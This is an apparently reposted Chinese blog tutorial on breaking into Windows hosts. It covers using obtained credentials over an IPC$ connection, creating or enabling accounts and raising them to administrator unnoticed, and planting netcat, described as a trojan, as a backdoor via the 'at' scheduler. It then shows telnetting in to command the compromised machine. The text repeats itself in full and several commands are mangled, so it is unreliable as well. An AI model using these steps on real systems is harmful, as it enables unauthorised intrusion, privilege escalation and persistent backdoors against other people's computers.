hei你懂的(转)
2013-10-30 11:53
148 查看
网络中最常用的命令:net
只要你拥有某ip的用户名和密码,就可以进行ipc$空连接!
这里我们假如你得到的用户是fish,密码是123456。假设对方ip为127.0.0.1
net use 127.0.0.1ipc$ "123456"
/user:"fish"
切断空连接的命令是
net use 127.0.0.1ipc$ /delte
这样你便等于登录上了此ip的电脑,但至此你还没有获得任何权限
下面讲述如何创建一个自己的帐户
net user honkstudent 123 /add
如果命令显示成功,则说明添加用户成功,下一步要做的便是将此用户提升为管理员
net localgroup administrator honkstudent
/add
如果命令显示成功,说明己经升级此用户的权限为管理员.
如果怕让管理员发现而不想自己创建帐户,便可以将默认的guest帐户提升为管理员
net user guest /active:yes
如果命令成功,则激活windows下guest帐户成功,
下一步便为guest帐户添加密码
net user guest 123
命令成功后你便拥有了系统游客的权限,但这些远远不够,猜到后面该怎么做了吧?^_^
net localgroup administrator guest
/add
命令成功后你这个游客便拥有了和管理员一样的操作等级了 2:远程运行命令:at
如果您己经进入某台主机后,想为将来"名正言顺"的再次进入该主机作打算,该怎么办呢?不用说,当然得做个后门,这就少不了远程运行命令:at
首先你要将你最得意的木马植入那台服务器,
copy c:nc.exe 127.0.0.1admin$
(介绍一下nc.nc为netcat简称,是网上最有名的木马程序之一,运行后打开系统telnet服务,默认端口为99)
然后所要做的事便是要让这个后门在服务器上运行:
首先获得服务器上时间:net time 127.0.0.1
假设返回的对方系统时间为11:58
获得时间后你便可以对系统加入一个作业id,id=1(必须要系统启动了schedule服务)
at 127.0.0.1 12:00 nc.exe
如果命令成功便会返回一个id号,你便可以在12:00以后远程登录上这台服务器了 3:远程登录:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种
了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
辟如:
cmd>ping -t ping对方机器
(前提:对方没有进行tcp/ip数据包限制)
cmd>netstat -a ipaddress
(获取对方机器当前活动的相关进程)
cmd>net view ip-address (
通上,适用于win98)
cmd>net use x:ipipc$ /user:username password
(用相关账号和密码登陆对方机器)
cmd>net send ip message 向指定ip发送message
(前提是对方机器没有关message se
nd 服务)
cmd>net time (
是对方机器时间于本机同步)
cmd>at ipaddress time c:winntsystem32net.exe user
account password /add
(在对方机器中增添账号和密码)
cmd>copy con *.bat @echo
tsenable=on>>
cmd>copy *.bat x: (
复制文件到对方机器)
ftp
telnet
只要你拥有某ip的用户名和密码,就可以进行ipc$空连接!
这里我们假如你得到的用户是fish,密码是123456。假设对方ip为127.0.0.1
net use 127.0.0.1ipc$ "123456"
/user:"fish"
切断空连接的命令是
net use 127.0.0.1ipc$ /delte
这样你便等于登录上了此ip的电脑,但至此你还没有获得任何权限
下面讲述如何创建一个自己的帐户
net user honkstudent 123 /add
如果命令显示成功,则说明添加用户成功,下一步要做的便是将此用户提升为管理员
net localgroup administrator honkstudent
/add
如果命令显示成功,说明己经升级此用户的权限为管理员.
如果怕让管理员发现而不想自己创建帐户,便可以将默认的guest帐户提升为管理员
net user guest /active:yes
如果命令成功,则激活windows下guest帐户成功,
下一步便为guest帐户添加密码
net user guest 123
命令成功后你便拥有了系统游客的权限,但这些远远不够,猜到后面该怎么做了吧?^_^
net localgroup administrator guest
/add
命令成功后你这个游客便拥有了和管理员一样的操作等级了 2:远程运行命令:at
如果您己经进入某台主机后,想为将来"名正言顺"的再次进入该主机作打算,该怎么办呢?不用说,当然得做个后门,这就少不了远程运行命令:at
首先你要将你最得意的木马植入那台服务器,
copy c:nc.exe 127.0.0.1admin$
(介绍一下nc.nc为netcat简称,是网上最有名的木马程序之一,运行后打开系统telnet服务,默认端口为99)
然后所要做的事便是要让这个后门在服务器上运行:
首先获得服务器上时间:net time 127.0.0.1
假设返回的对方系统时间为11:58
获得时间后你便可以对系统加入一个作业id,id=1(必须要系统启动了schedule服务)
at 127.0.0.1 12:00 nc.exe
如果命令成功便会返回一个id号,你便可以在12:00以后远程登录上这台服务器了 3:远程登录:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种
了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
辟如:
cmd>ping -t ping对方机器
(前提:对方没有进行tcp/ip数据包限制)
cmd>netstat -a ipaddress
(获取对方机器当前活动的相关进程)
cmd>net view ip-address (
通上,适用于win98)
cmd>net use x:ipipc$ /user:username password
(用相关账号和密码登陆对方机器)
cmd>net send ip message 向指定ip发送message
(前提是对方机器没有关message se
nd 服务)
cmd>net time (
是对方机器时间于本机同步)
cmd>at ipaddress time c:winntsystem32net.exe user
account password /add
(在对方机器中增添账号和密码)
cmd>copy con *.bat @echo
tsenable=on>>
cmd>copy *.bat x: (
复制文件到对方机器)
ftp
telnet
相关文章推荐
- mysql 笔记二
- POJ 2033 Alphacode(26编码,水题)
- python模块学习---glob 文件路径查找
- Windows平台下libevent库的使用
- XAMPP Apach无法启动
- 修改apache上传文件大小限制
- windows下安装和使用geany
- 比古数据采集器 - 关于数据采集软件的一点思路 .
- u-boot的环境变量详解
- HOOK技术
- jsp指令 详解
- JSP脚本和指令的使用
- java 中的 加密
- java 中 路径的获取 (转)
- IO 总结 (转)
- mysql 模糊查询
- html 特殊字符(转)
- HTML 标签大全(转)
- js中,参数的配置
- js删除前 让用户确定